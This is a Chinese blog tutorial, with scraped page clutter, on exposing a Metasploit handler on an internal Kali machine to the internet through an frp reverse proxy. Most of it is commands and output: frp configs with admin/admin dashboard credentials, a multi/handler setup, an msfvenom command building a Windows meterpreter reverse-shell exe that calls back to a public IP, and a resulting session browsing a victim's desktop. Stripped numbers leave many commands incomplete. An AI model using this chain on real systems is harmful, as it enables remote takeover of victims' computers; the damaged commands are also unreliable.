正文
内网Metasploit映射到外网
小程序:扫一扫查出行
【扫一扫了解最新限行尾号】
复制小程序
【扫一扫了解最新限行尾号】
复制小程序
下载frp
Github项目地址:https://github.com/fatedier/frp
找到最新的releases下载,系统版本自行确认。
下载方法:
wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz
tar zxvf frp_0..1_linux_amd64.tar.gz
cd frp_0..1_linux_amd64
公网服务器配置:
修改配置文件:
[yuyongxr@instance- frp_0..1_linux_amd64]$ vim frps.ini
[common]
bind_port =
dashboard_port =
dashboard_user = admin
dashboard_pwd = admin
启动服务:
[yuyongxr@instance- frp_0..1_linux_amd64]$ nohup ./frps -c frps.ini > log.txt &
kali linux 配置:
修改配置文件:
kali@kali:~/frp_0..1_linux_amd64$ vim frpc.ini
[common]
server_addr = xx.xx.xx.xx
server_port = [msf]
type = tcp
local_ip = 127.0.0.1
local_port =
remote_port =
启动服务:
kali@kali:~/frp_0..1_linux_amd64$ nohup ./frpc -c frpc.ini > log.txt &
metasploit配置:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/handler) > set lport
lport =>
生成payload文件:
e2a5e@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=34.80.29.48 lport= -f exe -o test.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: bytes
Final size of exe file: bytes
Saved as: test.exe
执行payload文件,测试效果:
msf5 exploit(multi/handler) > exploit [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:
[*] Sending stage ( bytes) to 127.0.0.1
[*] Meterpreter session opened (127.0.0.1: -> 127.0.0.1:) at -- :: +meterpreter > ls
Listing: C:\Users\win7\Desktop
==============================Mode Size Type Last modified Name
---- ---- ---- ------------- ----
/rw-rw-rw- fil -- :: + Google Chrome.lnk
/rwxrwxrwx fil -- :: + PCHunter64.exe
/rwxrwxrwx dir -- :: + PanDownload
/rw-rw-rw- fil -- :: + desktop.ini
/rwxrwxrwx fil -- :: + test.exemeterpreter >